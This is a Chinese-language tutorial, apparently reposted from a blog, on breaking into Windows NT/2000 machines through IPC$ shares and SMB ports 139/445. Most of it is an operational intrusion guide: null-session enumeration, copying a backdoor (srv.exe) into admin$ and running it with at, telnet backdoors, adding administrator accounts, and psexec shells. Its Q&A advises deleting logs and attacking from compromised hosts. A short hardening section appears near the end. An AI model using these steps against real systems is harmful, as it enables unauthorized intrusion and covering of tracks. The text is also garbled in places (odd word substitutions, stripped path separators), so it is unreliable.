zoukankan      html  css  js  c++  java
  • 445port入侵具体解释

    445port入侵具体解释
       关于“445port入侵”的内容
    445port入侵具体解释
    本站搜索很多其它关于“445port入侵”的内容

    445port入侵,在这之前我们首先要看的还是445port为什么回成为入侵的port呢?
    445port就是IPC 服务的默认port
                                                                ipc$
    一 摘要
    二 什么是 ipc$
    三 什么是空会话
    四 空会话能够做什么
    五 ipc$ 所使用的port
    六 ipc 管道在 hack 攻击中的意义
    七 ipc$ 连接失败的常见原因
    八 拷贝文件失败的原因
    九 关于 at 命令和 xp 对 ipc$ 的限制
    十 怎样打开目标的 IPC$ 共享以及其它共享
    十一 一些须要 shell 才干完毕的命令
    十二 入侵中可能会用到的命令
    十三 对照过去和现今的 ipc$ 入侵
    十四 怎样防范 ipc$ 入侵
    十五 ipc$ 入侵问答精选
    十六 结束的话
    一 摘要
    网上关于 ipc$入侵的文章可谓多如牛毛,攻击步骤甚至已经成为了固化的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。只是话虽这样说,我觉得这些文章解说的并不具体,一些内容甚至是错误的,以致对 ipc$的提问差点儿占了各大安全论坛讨论区的半壁江山,并且这些问题经常都是反复的,严重影响了论坛质量和学习效率,因此我总结了这篇文章,希望能把 ipc$这部分东西尽量说清楚。
    注意:本文所讨论的各种情况均默认发生在 win NT/2000 环境下, win98 将不在此次讨论之列。
    二 什么是 ipc$
    IPC$(Internet Process Connection) 是共享 " 命名管道 "的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的username和口令,连接两方能够建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的訪问。 IPC$ 是 NT/2000 的一项新功能,它有一个特点,即在同一时间内,两个 IP 之间仅仅同意建立一个连接。NT/2000 在提供了 ipc$ 功能的同一时候,在初次安装系统时还打开了默认共享,即全部的逻辑共享 (c$,d$,e$ …… ) 和系统目录winnt 或 windows(admin$) 共享。全部的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的减少。
    平时我们总能听到有人在说 ipc$ 漏洞, ipc$ 漏洞,事实上 ipc$ 并非一个真正意义上的漏洞 , 我想之所以有人这么说,一定是指微软自己安置的那个‘后门':空会话( Null session )。那么什么是空会话呢?
    三 什么是空会话
    在介绍空会话之前,我们有必要了解一下一个安全会话是怎样建立的。
    在 Windows NT 4.0 中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话将成为一个安全隧道,建立两方通过它互通信息,这个过程的大致顺序例如以下:
    1 )会话请求者(客户)向会话接收者(server)传送一个数据包,请求安全隧道的建立;
    2 )server产生一个随机的 64 位数(实现挑战)传送回客户;
    3 )客户取得这个由server产生的 64 位数,用试图建立会话的帐号的口令打乱它,将结果返回到server(实现响应);
    4 )server接受响应后发送给本地安全验证( LSA ), LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。假设请求者的帐号是server的本地帐号,核实本地发生;假设请求的帐号是一个域的帐号,响应传送到域控制器去核实。当对挑战的响应核实为正确后,一个訪问令牌产生,然后传送给客户。客户使用这个訪问令牌连接到server上的资源直到建议的会话被终止。
    以上是一个安全会话建立的大致过程,那么空会话又怎样呢?
    空会话是在没有信任的情况下与server建立的会话(即未提供username与password),但依据 WIN2000的訪问控制模型,空会话的建立相同须要提供一个令牌,但是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中不包括用户信息,因此,这个会话不能让系统间发送加密信息,但这并不表示空会话的令牌中不包括安全标识符 SID (它标识了用户和所属组),对于一个空会话, LSA 提供的令牌的SID 是 S- 1-5-7 ,这就是空会话的 SID ,username是: ANONYMOUS LOGON(这个username是能够在用户列表中看到的,但是是不能在 SAM 数据库中找到,属于系统内置的帐号),这个訪问令牌包括以下伪装的组:
    Everyone
    Network
    在安全策略的限制下,这个空会话将被授权訪问到上面两个组有权訪问到的一切信息。那么建立空会话究竟能够作什么呢?
    四 空会话能够做什么
    对于 NT ,在默认安全设置下,借助空连接能够列举目标主机上的用户和共享,訪问 everyone权限的共享,訪问小部分注冊表等,并没有什么太大的利用价值;对 2000 作用更小,由于在 Windows 2000和以后版本号中默认仅仅有管理员和备份操作员有权从网络訪问到注冊表,并且实现起来也不方便,需借助工具。
    从这些我们能够看到,这样的非信任会话并没有多大的用处,但从一次完整的 ipc$入侵来看,空会话是一个必不可少的跳板,由于我们从它那里能够得到户列表,而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的,成功的导出用户列表大大添加�了猜解的成功率,仅从这一点,足以说明空会话所带来的安全隐患,因此说空会话毫无用处的说法是不对的。以下是空会话中能够使用的一些具体命令:
    1 首先,我们先建立一个空会话(当然,这须要目标开放 ipc$ )
    命令: net use \ipipc$ "" /user:""
    注意:上面的命令包括四个空格, net 与 use 中间有一个空格, use 后面一个,password左右各一个空格。
    2 查看远程主机的共享资源
    命令: net view \ip
    解释:前提是建立了空连接后,用此命令能够查看远程主机的共享资源,假设它开了共享,能够得到如以下的结果,但此命令不能显示默认共享。
    在 \*.*.*.* 的共享资源
    资源共享名 类型 用途 凝视
    -----------------------------------------------------------
    NETLOGON Disk Logon server share
    SYSVOL Disk Logon server share
    命令成功完毕。
    3 查看远程主机的当前时间
    命令: net time \ip
    解释:用此命令能够得到一个远程主机的当前时间。
    4 得到远程主机的 NetBIOS username列表(须要打开自己的 NBT )
    命令: nbtstat -A ip
    用此命令能够得到一个远程主机的 NetBIOS username列表,返回例如以下结果:
    Node IpAddress: [*.*.*.*] Scope Id: []
    NetBIOS Remote Machine Name Table
    Name Type Status
    ---------------------------------------------
    SERVER <00> UNIQUE Registered
    OYAMANISHI-H <00> GROUP Registered
    OYAMANISHI-H < 1C > GROUP Registered
    SERVER <20> UNIQUE Registered
    OYAMANISHI-H <1B> UNIQUE Registered
    OYAMANISHI-H <1E> GROUP Registered
    SERVER <03> UNIQUE Registered
    OYAMANISHI-H <1D> UNIQUE Registered
    ..__MSBROWSE__.<01> GROUP Registered
    INet~Services < 1C > GROUP Registered
    IS~SERVER......<00> UNIQUE Registered
    MAC Address = 00-50-8B -9A -2D-37
    以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,只是要注意一点:建立 IPC$ 连接的操作会在 Event Log 中留下记录,无论你是否登录成功。 好了,那么以下我们就来看看 ipc$ 所使用的port是什么?
    五 ipc$ 所使用的port
    首先我们来了解一些基础知识:
    1 SMBServer Message Block) Windows 协议族,用于文件打印共享的服务;
    2 NBTNETBios Over TCP/IP) 使用 137 ( UDP ) 138 ( UDP ) 139 ( TCP )port实现基于 TCP/IP 协议的 NETBIOS 网络互联。
    3 在 WindowsNT 中 SMB 基于 NBT 实现,即使用 139 ( TCP )port;而在 Windows2000 中, SMB 除了基于 NBT 实现,还能够直接通过 445 port实现。
    有了这些基础知识,我们就能够进一步来讨论訪问网络共享对port的选择了:
    对于 win2000 client(发起端)来说:
    1 假设在同意 NBT 的情况下连接server时,client会同一时候尝试訪问 139 和 445 port,假设 445 port有响应,那么就发送 RST包给 139 port断开连接,用 455 port进行会话,当 445 port无响应时,才使用 139 port,假设两个port都没有响应,则会话失败;
    2 假设在禁止 NBT 的情况下连接server时,那么client仅仅会尝试訪问 445 port,假设 445 port无响应,那么会话失败。
    对于 win2000 server端来说:
    1 假设同意 NBT, 那么 UDP port 137, 138, TCP port 139, 445 将开放( LISTENING );
    2 假设禁止 NBT ,那么仅仅有 445 port开放。
    我们建立的 ipc$ 会话对port的选择相同遵守以上原则。显而易见,假设远程server没有监听 139 或 445 port, ipc$ 会话是无法建立的。
    六 ipc 管道在 hack 攻击中的意义
    ipc 管道本来是微软为了方便管理员进行远程管理而设计的,但在入侵者看来,开放 ipc 管道的主机似乎更容易得手。通过 ipc管道,我们能够远程调用一些系统函数(大多通过工具实现,但须要对应的权限),这往往是入侵成败的关键。假设不考虑这些,仅从传送文件这一方面,ipc 管道已经给了入侵者莫大的支持,甚至已经成为了最重要的传输手段,因此你总能在各大论坛上看到一些朋友由于打不开目标机器的 ipc管道而一筹莫展大呼救命。当然,我们也不能忽视权限在 ipc管道中扮演的重要角色,想必你一定品尝过空会话的尴尬,没有权限,开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限,那么 ipc管道这把双刃剑将显示出它狰狞的一面。
    七 ipc$ 连接失败的常见原因
    以下是一些常见的导致 ipc$ 连接失败的原因:
    1 IPC 连接是 Windows NT 及以上系统中特有的功能,由于其须要用到 Windows NT 中非常多 DLL 函数,所以不能在Windows 9.x/Me 系统中执行,也就是说仅仅有 nt/2000/xp 才干够相互建立 ipc$ 连接, 98/me 是不能建立ipc$ 连接的;
    2 假设想成功的建立一个 ipc$ 连接,就须要响应方开启 ipc$ 共享,即使是空连接也是这样,假设响应方关闭了 ipc$ 共享,将不能建立连接;
    3 连接发起方未启动 Lanmanworkstation 服务(显示名为: Workstation ):它提供网络链结和通讯,没有它发起方无法发起连接请求;
    4 响应方未启动 Lanmanserver 服务(显示名为: Server ):它提供了 RPC 支持、文件、打印以及命名管道共享, ipc$ 依赖于此服务,没有它主机将无法响应发起方的连接请求,只是没有它仍可发起 ipc$ 连接;
    5 响应方未启动 NetLogon ,它支持网络上计算机 pass-through 帐户登录身份(只是这样的情况好像不多);
    6 响应方的 139 , 445 port未处于监听状态或被防火墙屏蔽;
    7 连接发起方未打开 139 , 445 port;
    8 username或者password错误:假设发生这样的错误,系统将给你相似于 ' 无法更新password ' 这样的错误提示(显然空会话排除这样的错误);
    9 命令输入错误:可能多了或少了空格,当username和password中不包括空格时两边的双引號能够省略,假设password为空,能够直接输入两个引號 "" 就可以;
    10 假设在已经建立好连接的情况下对方重新启动计算机,那么 ipc$ 连接将会自己主动断开,须要又一次建立连接。
    另外 , 你也能够依据返回的错误号分析原因:
    错误号 5 ,拒绝訪问:非常可能你使用的用户不是管理员权限的;
    错误号 51 , Windows 无法找到网络路径:网络有问题;
    错误号 53 ,找不到网络路径: ip 地址错误;目标未开机;目标 lanmanserver 服务未启动;目标有防火墙(port过滤);
    错误号 67 ,找不到网络名:你的 lanmanworkstation 服务未启动或者目标删除了 ipc$ ;
    错误号 1219 ,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个 ipc$ ,请删除再连;
    错误号 1326 ,未知的username或错误password:原因非常明显了;
    错误号 1792 ,试图登录,但是网络登录服务没有启动:目标 NetLogon 服务未启动;
    错误号 2242 ,此用户的password已经过期:目标有帐号策略,强制定期要求更改password。
    八 拷贝文件失败的原因
    有些朋友尽管成功的建立了 ipc$ 连接,但在 copy 时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢?
    1 对方未开启共享目录
    这类错误出现的最多,占到 50% 以上。很多朋友在 ipc$连接建立成功后,甚至都不知道对方是否有共享目录,就进行盲目复制,结果导致复制失败并且郁闷的非常。因此我建议大家在进行复制之前务必用 netview \IP 这个命令看一下你想要复制的共享目录是否存在(用软件查看当然更好),不要觉得能建立 ipc$ 连接就一定有共享目录存在。
    2 向默认共享复制失败
    这类错误也是大家经常犯的,主要有两个小方面:
    1 )错误的觉得能建立 ipc$ 连接的主机就一定开启了默认共享,因而在建立完连接之后立即向 c$,d$,admin$之类的默认共享拷贝文件,一旦对方未开启默认共享,将导致复制失败。 ipc$ 连接成功仅仅能说明对方打开了 ipc$共享,并不能说明默认共享一定存在。 ipc$ 共享与默认共享是 两码 事, ipc$共享是一个命名管道,并非哪个实际的目录,而默认共享却是实实在在的共享目录;
    2 )由于 net view \IP 这个命令无法显示默认共享目录(由于默认共享带 $),因此通过这个命令,我们并不能推断对方是否开启了默认共享,因此假设对方未开启默认共享,那么全部向默认共享进行的操作都不能成功;(只是大部分扫描软件在扫弱口令的同一时候,都能扫到默认共享目录,能够避免此类错误的发生)
    要点:请大家一定区分 ipc 共享,默认共享,普通共享这三者的差别: ipc 共享是一个管道,并非实际的共享目录;默认共享是安装时默认打开的目录;普通共享是我们自己开启的能够设置权限的共享目录。
    3 用户权限不够,包括四种情形:
    1 )空连接向全部共享(默认共享和普通共享)复制时,权限是不够的;
    2 )向默认共享复制时,在 Win2000 Pro 版中,仅仅有 Administrators 和 Backup Operators 组成员才干够,在 Win2000 Server 版本号 Server Operatros 组也能够訪问到这些共享目录;
    3 )向普通共享复制时,要具有对应权限(即对方管理员事先设定的訪问权限);
    4 )对方能够通过防火墙或安全软件的设置,禁止外部訪问共享;
    注意:
    1 不要觉得 administrator 就一定具有管理员权限,管理员名称是能够改的
    2 管理员能够訪问默认共享的目录,但不一定能够訪问普通的共享目录,由于管理员能够对普通的共享目录进行訪问权限设置,如图 6 ,管理员为D 盘设置的訪问权限为仅同意名为 xinxin 的用户对该目录进行全然訪问,那么此时即使你拥有管理员权限,你仍然不能訪问 D盘。只是有意思的是,假设此时对方又开启了 D$ 的默认共享,那么你却能够訪问 D$ ,从而绕过了权限限制,有兴趣的朋友能够自己做測试。
    4 被防火墙杀死或在局域网
    另一种情况,那就是或许你的复制操作已经成功,但当远程执行时,被防火墙杀掉了,导致找不到文件;或者你把木马拷贝到了局域网内的主机,导致连接失败(反向连接的木马不会发生这样的情况)。假设你没有想到这样的情况,你会以为是复制上出了问题,但实际你的复制操作已经成功了,仅仅是执行时出了问题。
    呵呵,大家也知道, ipc$ 连接在实际操作过程中会出现各种各样的问题,上面我所总结的仅仅是一些常见错误,没说到的,大家能够给我提个醒儿。
    九 关于 at 命令和 xp 对 ipc$ 的限制
    本来还想说一下用 at 远程执行程序失败的原因,但考虑到 at的成功率不是非常高,问题也非常多,在这里就不提它了(提的越多,用的人就越多),而是推荐大家用 psexec.exe远程执行程序,假设想要远程机器执行本地 c:xinxin.exe 文件,且管理员为 administrator ,password为 1234,那么输入以下的命令:
    psexec \ip -u administrator -p 1234 -c c:xinxin.exe
    假设已经建立 ipc 连接,则 -u -p 这两个參数不须要, psexec.exe 将自己主动拷贝文件到远程机器并执行。
    本来 xp 中的 ipc$ 也不想在这里讨论,想单独拿出来讨论,但看到越来越多的朋友非常急切的提问为什么遇到 xp的时候,大部分操作都非常难成功。我在这里就简单提一下吧,在 xp的默认安全选项中,不论什么远程訪问仅被赋予来宾权限,也就是说即使你是用管理员帐户和password,你所得到的权限也仅仅是 Guest,因此大部分操作都会由于权限不够而失败,并且到眼下为止并没有一个好的办法来突破这一限制。所以假设你真的得到了 xp的管理员password,我建议你尽量避开 ipc 管道。
    十 怎样打开目标的 IPC$ 共享以及其它共享
    目标的 ipc$ 不是轻易就能打开的,否则就要天下打乱了。你须要一个 admin 权限的 shell ,比方 telnet ,木马, cmd 重定向等,然后在 shell 下执行:
    net share ipc$
    开放目标的 ipc$ 共享;
    net share ipc$ /del
    关闭目标的 ipc$ 共享;假设你要给它开共享目录,你能够用:
    net share xinxin=c:
    这样就把它的 c 盘开为共享名为 xinxin 共享目录了。(但是我发现非常多人错误的觉得开共享目录的命令是 net share c$ ,还大模大样的给菜鸟指指点点,真是误人子弟了)。再次声明,这些操作都是在 shell 下才干实现的。
    十一 一些须要 shell 才干完毕的命令
    看到非常多教程这方面写的十分不准确,一些须要 shell 才干完毕命令就简简单单的在 ipc$ 连接下执行了,起了误导作用。那么以下我总结一下须要在 shell 才干完毕的命令:
    1 向远程主机建立用户,激活用户,改动用户password,加入管理组的操作须要在 shell 下完毕;
    2 打开远程主机的 ipc$ 共享,默认共享,普通共享的操作须要在 shell 下完毕;
    3 执行 / 关闭远程主机的服务,须要在 shell 下完毕;
    4 启动 / 杀掉远程主机的进程,也须要在 shell 下完毕(用软件的情况下除外,如 pskill )。
    十二 入侵中可能会用到的命令
    为了这份教程的完整性,我列出了 ipc$入侵中的一些经常使用命令,假设你已经掌握了这些命令,你能够跳过这一部分看以下的内容。请注意这些命令是适用于本地还是远程,假设仅仅适用于本地,你仅仅能在获得远程主机的 shell (如 cmd , telnet 等)后,才干向远程主机执行。
    1 建立 / 删除 ipc$ 连接的命令
    1 )建立空连接 :
    net use \127.0.0.1ipc$ "" /user:""
    2 )建立非空连接 :
    net use \127.0.0.1ipc$ " password " /user:" username "
    3 )删除连接 :
    net use \127.0.0.1ipc$ /del
    2 在 ipc$ 连接中对远程主机的操作命令
    1 ) 查看远程主机的共享资源(看不到默认共享) :
    net view \127.0.0.1
    2 ) 查看远程主机的当前时间 :
    net time \127.0.0.1
    3 ) 得到远程主机的 netbios username列表 :
    nbtstat -A 127.0.0.1
    4 )映射 / 删除远程共享 :
    net use z: \127.0.0.1c
    此命令将共享名为 c 的共享资源映射为本地 z 盘
    net use z: /del
    删除映射的 z 盘,其它盘类推
    5 )向远程主机拷贝文件 :
    copy 路径 文件名称 \IP 共享目录名,如:
    copy c:xinxin.exe \127.0.0.1c$ 即将 c 盘下的 xinxin.exe 拷贝到对方 c 盘内
    当然,你也能够把远程主机上的文件拷贝到自己的机器里:
    copy \127.0.0.1c$xinxin.exe c:
    6 )远程加入�计划任务 :
    at \IP 时间 程序名 如:
    at \127.0.0.0 11:00 xinxin.exe
    注意:时间尽量使用 24 小时制;假设你打算执行的程序在系统默认搜索路径(比方 system32/ )下则不用加路径,否则必须加全路径
    3 本地命令
    1 )查看本地主机的共享资源(能够看到本地的默认共享)
    net share
    2 )得到本地主机的用户列表
    net user
    3 )显示本地某用户的帐户信息
    net user 帐户名
    4 )显示本地主机当前启动的服务
    net start
    5 )启动 / 关闭本地服务
    net start 服务名
    net stop 服务名
    6 )在本地加入�帐户
    net user 帐户名 password /add
    7 )激活禁用的用户
    net uesr 帐户名 /active:yes
    8 )加入管理员组
    net localgroup administrators 帐户名 /add
    非常显然的是,尽管这些都是本地命令,但假设你在远程主机的 shell 中输入,比方你 telnet 成功后输入上面这些命令,那么这些本地输入将作用在远程主机上。
    4 其它一些命令
    1 ) telnet
    telnet IP port
    telnet 127.0.0.0 23
    2 )用 opentelnet.exe 开启远程主机的 telnet
    OpenTelnet.exe \ip 管理员帐号 password NTLM 的认证方式 port
    OpenTelnet.exe \127.0.0.1 administrator "" 1 90
    只是这个小工具须要满足四个要求:
    1 )目标开启了 ipc$ 共享
    2 )你要拥有管理员password和帐号
    3 )目标开启 RemoteRegistry 服务,用户就能够更改 ntlm 认证
    4 )对仅 WIN2K/XP 有效
    3 )用 psexec.exe 一步获得 shell ,须要 ipc 管道支持
    psexec.exe \IP -u 管理员帐号 -p password cmd
    psexec.exe \127.0.0.1 -u administrator -p "" cmd
    十三 对照过去和现今的 ipc$ 入侵
    既然是对照,那么我就先把过去的 ipc$ 入侵步骤写给大家,都是蛮经典的步骤:
    [1]
    C:>net use \127.0.0.1ipc$ "" /user:admintitrators
    \ 用扫到的空口令建立连接  
    [2]
    c:>net view \127.0.0.1
    \ 查看远程的共享资源
    [3]
    C:>copy srv.exe \127.0.0.1admin$system32
    \ 将一次性后门 srv.exe 拷贝到对方的系统目录下,前提是 admin$ 开启  
    [4]
    C:>net time \127.0.0.1
    \ 查看远程主机的当前时间
    [5]
    C:>at \127.0.0.1 时间 srv.exe
    \ 用 at 命令远程执行 srv.exe ,须要对方开启了 'Task Scheduler' 服务  
    [6]
    C:>net time \127.0.0.1
    \ 再次查看当前时间来估算 srv.exe 是否已经执行,此步能够省略
    [7]
    C:>telnet 127.0.0.1 99
    \ 开一个新窗体,用 telnet 远程登陆到 127.0.0.1 从而获得一个 shell( 不懂 shell 是什么意思?那你就把它想象成远程机器的控制权就好了,操作像 DOS) , 99 port是 srv.exe 开的一次性后门的port  
    [8]
    C:WINNTsystem32>net start telnet
    \ 我们在刚刚登陆上的 shell 中启动远程机器的 telnet 服务,毕竟 srv.exe 是一次性的后门,我们须要一个长久的后门便于以后訪问,假设对方的 telnet 已经启动,此步可省略
    [9]
    C:>copy ntlm.exe \127.0.0.1admin$system32
    \ 在原来那个窗体中将 ntlm.exe 传过去, ntlm.exe 是用来更改 telnet 身份验证的  
    [10]
    C:WINNTsystem32>ntlm.exe
    \ 在 shell 窗体中执行 ntlm.exe ,以后你就能够畅通无阻的 telnet 这台主机了
    [11]
    C:>telnet 127.0.0.1 23
    \ 在新窗体中 telnet 到 127.0.0.1 ,port 23 可省略,这样我们又获得一个长期的后门
    [12]
    C:WINNTsystem32>net user 帐户名 password /add
    C:WINNTsystem32>net uesr guest /active:yes
    C:WINNTsystem32>net localgroup administrators 帐户名 /add
    \telnet 上以后,你能够建立新帐户,激活 guest ,把不论什么帐户加入管理员组等
    好了,写到这里我似乎回到了 2 , 3 年前,那时的 ipc$ 大家都是这么用的,只是随着新工具的出现,上面提到的一些工具和命令如今已经不经常使用到了,那就让我们看看如今的高效而简单的 ipc$ 入侵吧。
    [1]
    psexec.exe \IP -u 管理员帐号 -p password cmd
    \ 用这个工具我们能够一步到位的获得 shell
    OpenTelnet.exe \server 管理员帐号 password NTLM 的认证方式 port
    \ 用它能够方便的更改 telnet 的验证方式和port,方便我们登陆
    [2]
    已经没有第二步了,用一步获得 shell 之后,你做什么都能够了,安后门能够用 winshell ,克隆就用 ca 吧,开终端用 3389.vbe ,记录password用 win2kpass ,总之好的工具不少,随你选了,我就不多说了。
    十四 怎样防范 ipc$ 入侵
    1 禁止空连接进行枚举 ( 此操作并不能阻止空连接的建立 )
    执行 regedit ,找到例如以下主键 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA] 把 RestrictAnonymous = DWORD 的键值改为: 1
    假设设置为 "1" ,一个匿名用户仍然能够连接到 IPC$ 共享,但无法通过这样的连接得到列举 SAM 帐号和共享信息的权限;在 Windows2000 中添加�了 "2" ,未取得匿名权的用户将不能进行 ipc$ 空连接。建议设置为 1。假设上面所说的主键不存在,就新建一个再改键值。假设你觉得改注冊表麻烦,能够在本地安全设置中设置此项: 在本地安全设置-本地策略-安全选项-' 对匿名连接的额外限制 '
    2 禁止默认共享
    1 )察看本地共享资源
    执行 -cmd- 输入 net share
    2 )删除共享(重起后默认共享仍然存在)
    net share ipc$ /delete
    net share admin$ /delete
    net share c$ /delete
    net share d$ /delete (假设有 e,f, ……能够继续删除)
    3 )停止 server 服务
    net stop server /y (又一次启动后 server 服务会又一次开启)
    4 )禁止自己主动打开默认共享(此操作并不能关闭 ipc$ 共享)
    执行 -regedit
    server 版 : 找到例如以下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把 AutoShareServer ( DWORD )的键值改为 :00000000 。
    pro 版 : 找到例如以下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把 AutoShareWks ( DWORD )的键值改为 :00000000 。
    这两个键值在默认情况下在主机上是不存在的,须要自己手动加入�,改动后重起机器使设置生效。
    3 关闭 ipc$ 和默认共享依赖的服务 :server 服务
    假设你真的想关闭 ipc$ 共享,那就禁止 server 服务吧:
    控制面板 - 管理工具 - 服务 - 找到 server 服务(右击) - 属性 - 常规 - 启动类型 - 选已禁用,这时可能会有提示说: XXX 服务也会关闭是否继续,由于还有些次要的服务要依赖于 server 服务,不要管它。
    4 屏蔽 139 , 445 port
    由于没有以上两个port的支持,是无法建立 ipc$ 的,因此屏蔽 139 , 445 port相同能够阻止 ipc$ 入侵。
    1 ) 139 port能够通过禁止 NBT 来屏蔽
    本地连接- TCP/IT 属性-高级- WINS -选‘禁用 TCP/IT 上的 NETBIOS '一项
    2 ) 445 port能够通过改动注冊表来屏蔽
    加入�一个键值
    Hive: HKEY_LOCAL_MACHINE
    Key: SystemControlsetServicesNetBTParameters
    Name: SMBDeviceEnabled
    Type: REG_DWORD
    value: 0
    改动完后重新启动机器
    注意:假设屏蔽掉了以上两个port,你将无法用 ipc$ 入侵别人。
    3 )安装防火墙进行port过滤
    6 设置复杂password,防止通过 ipc$ 穷举出password,我觉得这才是最好的办法,增强安全意识,比不停的打补丁要安全的多。
    十五 ipc$ 入侵问答精选
    上面说了一大堆的理论东西,但在实际中你会遇到各种各样的问题,因此为了给予大家最大的帮助,我整理了各大安全论坛中一些有代表性的问答,当中的一些答案是我给出的,一些是论坛上的回复,假设有什么疑问,能够来找我讨论。
    1. 进行 ipc$ 入侵的时候,会在server中留下记录,有什么办法能够不让server发现吗?
    答:留下记录是一定的,你走后用清除日志程序删除就能够了,或者用肉鸡入侵。
    2. 你看以下的情况是为什么,能够连接但不能复制
    net use \***.***.***.***ipc$ " password " /user:" username "
    命令成功
    copy icmd.exe \***.***.***.***admin$
    找不到网络路径
    命令不成功
    答:像“找不到网络路径”“找不到网络名”之类的问题,大多是由于你想要拷贝到的共享目录没有开启,所以在复制的时候会出现错误,你能够试着找找其它的共享目录。
    3. 假设对方开了 IPC$ ,且能建立空联接,但打开 C 、 D 盘时,都要求password,我知道是空连接没有太多的权限,但没别的办法了吗?
    答:建议先用流光或者别的什么扫描软件试着猜解一下password,假设猜不出来,仅仅能放弃,毕竟空连接的能力有限。
    4. 我已经猜解到了管理员的password,且已经 ipc$ 连接成功了,但 net view \ip 发现它没开默认共享,我该怎么办?
    答:首先纠正你的一个错误,用 net view \ip 是无法看到默认共享的,你能够试着将文件拷贝到 c$ , d$ 看看,假设都不行,说明他关闭了默认共享,那你就用 opentelnet.exe 或 psexec.exe 吧,使用方法上面有。
    5.ipc$ 连接成功后,我用以下的命令建立了一个帐户,却发现这个帐户在我自己的机器上,这是怎么回事?
    net uset ccbirds /add
    答: ipc$ 建立成功仅仅能说明你与远程主机建立了通信隧道,并不意味你取得了一个 shell ,仅仅有在获得一个 shell (比方 telnet )之后,你才干在远程机器建立一个帐户,否则你的操作仅仅是在本地进行。
    6. 我已进入了一台肉机,用的管理员帐号,能够看他的系统时间,但是复制程序到他的机子上却不行,每次都提示“拒绝訪问,已复制 0 个文件”,是不是对方有什么服务没开,我该怎么办?
    答:一般来说“拒绝訪问”都是权限不够的结果,可能是你用的帐户有问题,另一种可能,假设你想向普通共享目录拷贝文件却返回这个错误,说明这个目录设置的同意訪问用户中不包括你(哪怕你是管理员),这一点我在上一期文章中分析了。
    7. 我用 Win98 能与对方建立 ipc$ 连接吗?
    答:理论上不能够,要进行 ipc$ 的操作,建议用 win2000 ,用其它操作系统会带来很多不必要的麻烦。
    8. 我用 net use \ipipc$ "" /user "" 成功的建立了一个空会话,但用 nbtstat -A IP 却无法导出用户列表,这是为什么?
    答:空会话在默认的情况下是能够导出用户列表的,但假设管理员通过改动注冊表来禁止导出列表,就会出现你所说的情况;还有可能是你自己的 NBT 没有打开, netstat 命令是建立在 NBT 之上的。  
    9. 我建立 ipc$ 连接的时候返回例如以下信息:‘提供的凭据与已存在的凭据集冲突',怎么回事?
    答:呵呵,这说明你已经与目标主机建立了 ipc$ 连接,两个主机间同一时候建立两个 ipc$ 连接是不同意的。
    10. 我在映射的时候出现:
    F:>net use h: \211.161.134.*e$
    系统发生 85 错误。
    本地设备名已在使用中。这是怎么回事?
    答:你也太粗心了吧,这说明你有一个 h 盘了,映射到没有的盘符吧!
    11. 我建立了一个连接 f:>net use \*.*.*.*ipc$ "123" /user:"guest" 成功了,但当我映射时出现了错误,向我要password,怎么回事?
    F:>net use h: \*.*.*.*c$
    password在 \*.*.*.*c$ 无效。
    请键入 \*.*.*.*c$ 的password :
    系统发生 5 错误。
    拒绝訪问。
    答:呵呵,向你要password说明你当前使用的用户权限不够,不能映射 C$ 这个默认共享,想办法提升权限或者找管理员的弱口令吧!默认共享通常是须要管理员权限的。
    12. 我用 superscan 扫到了一个开了 139 port的主机,但为什么不能空连接呢?
    答:你混淆了 ipc$ 与 139 的关系,能进行 ipc$ 连接的主机一定开了 139 或 445 port,但开这两个port的主机可不一定能空连接,由于对方能够关闭 ipc$ 共享 .
    13. 我们局域网里的机器大多都是 xp ,我用流光扫描到几个 administrator 帐号口令是空,并且能够连接,但不能复制东西,说错误 5 。请问为什么?
    答: xp 的安全性要高一些,在安全策略的默认设置中,对本地帐户的网络登录进行身份验证的时候,默觉得来宾权限,即使你用管理员远程登录,也仅仅具有来宾权限,因此你拷贝文件,当然是错误 5 :权限不够。
    14. 我用 net use \192.168.0.2ipc$ "password" /user:"administrator" 成功,但是 net use i: \192.168.0.2c
    出现请键入 \192.168.0.2 的password,怎么回事情呢?我用的但是管理员呀?应该什么都能够訪问呀?
    答:尽管你具有管理员权限,但管理员在设置 c 盘共享权限时(注意:普通共享能够设置訪问权限,而默认共享则不能)可能并未设置同意 administrator 訪问,所以会出现上述问题。
    15. 假设自己的机器禁止了 ipc$, 是不是还能够用 ipc$ 连接别的机器?假设禁止 server 服务呢?
    答:禁止以上两项仍能够发起 ipc$ 连接,只是这样的问题自己动手试验会更好。
    16. 能告诉我以下的两个错误产生的原因吗?
    c:>net time \61.225.*.*
    系统发生 5 错误。
    拒绝訪问。
    c:>net view \61.225.*.*
    系统发生 5 错误。
    拒绝訪问。
    答:起初遇到这个问题的时候我也非常纳闷,错误 5表示权限不够,但是连空会话的权限都能够完毕上面的两个命令,他为什么不行呢?难道是他没建立连接?后来那个粗心的同志告诉我的确是这样,他忘记了自己已经删了 ipc$ 连接,之后他又输入了上面那两个命令,随之发生了错误 5 。
    17. 您看看这是怎么回事?
    F:>net time
    找不到时间server。
    请键入 NET HELPMSG 3912 以获得很多其它的帮助。
    答:答案非常easy,你的命令错了,应该是 net time \ip
    没输入 ip 地址,当然找不到server。 view 的命令也应该有 ip 地址,即: net view \ip 

    收藏 分享 评分

  • 相关阅读:
    性能测试方案和用例模板
    软件质量报告模板-产品质量度量
    性能测试报告模板
    SQL查询语法30例
    性能测试:Jmeter-Beanshell请求加密实例
    安全性测试:OWASP ZAP 2.8 使用指南(三):ZAP代理设置
    centos7下使用x11远程带窗口安装Oracle
    python Linux 环境 (版本隔离工具)
    Python多版本环境搭建(Linux系统)
    ArrayList1.8
  • 原文地址:https://www.cnblogs.com/hrhguanli/p/3853412.html
Copyright © 2011-2022 走看看